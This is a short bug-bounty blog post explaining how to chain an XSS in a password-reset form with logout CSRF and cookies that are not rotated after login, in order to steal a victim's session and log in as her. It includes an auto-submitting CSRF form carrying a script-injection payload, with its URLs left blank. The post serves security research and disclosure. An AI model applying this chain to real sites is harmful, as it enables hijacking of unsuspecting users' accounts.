How to use XSS in login form/remember password/registration

So, we have a Stored or Reflected XSS in the "Forgot your password" form.

But we cannot carry out the attack against the user, since this XSS is not inside the user account. And if we cannot provide the required PoC, the vulnerability poses no threat and cannot claim a larger reward in bug bounties!

However, such an XSS is fairly easy to turn into an XSS inside the personal account, and now I will tell you how to do it...

There is a page

There is a POST request, and the email field is not filtered:

POST /rememberpassword HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 159

In general, our task is to lure the victim to the page, run our code and steal her cookies. But this will not work if the victim is logged into her account.

And here two vulnerabilities come to our aid.

The first vulnerability is Logout CSRF.
1) The vulnerability lies in the fact that you can log the victim out without her consent, i.e. she visits a page and is thrown out of her account.

To prevent this, a unique CSRF token is attached to each logout link, as is done in social networks.

2) The second vulnerability is Broken Authentication & Session Management. It lies in the fact that when the victim logs out of her account and then logs back in, the cookies have not changed! This is dangerous, and bug number 2 can be used to exploit other bugs. New cookie values must be generated on every new login. We need to test this twice: compare the cookies before logout with the cookies after the next login; if not a single character has changed, the bug is present.
Thus the second bug is passive; nothing can be done with it on its own. With the first one we write our automatic CSRF exploit, loading the logout link of the victim's account in the HTML head as an image:

<img src="">
<form action="" method="POST">
<input type="hidden" name="formName" value="rememberpassword" />
<input type="hidden" name="email" value="&lt;script src='" />
<input type="hidden" name="humanizm[id]" value="d8ac3bdda21255b54bcdd549bb15962c" />
<input type="hidden" name="humanizm[input]" value="" />
<input type="submit" id="qiece" value="Submit request" />
</form>

Well, our exploit is done.

And once we have stolen the victim's cookies, we are free to log in to her account, because the COOKIES ARE NOT DESTROYED AFTER LOGOUT!!

I have run into similar vulnerabilities (Logout CSRF / Broken Authentication) everywhere, and with their help, combined with an XSS (one that is not in the user account) or with a sniffer, an account can easily be hacked (unless, of course, the cookie is httpOnly).

If you enjoyed this article, follow me on Twitter / retweet, and I will add more articles as I continue researching the security of web applications 🙂

#bugbounty #xss #BrokenAuthentication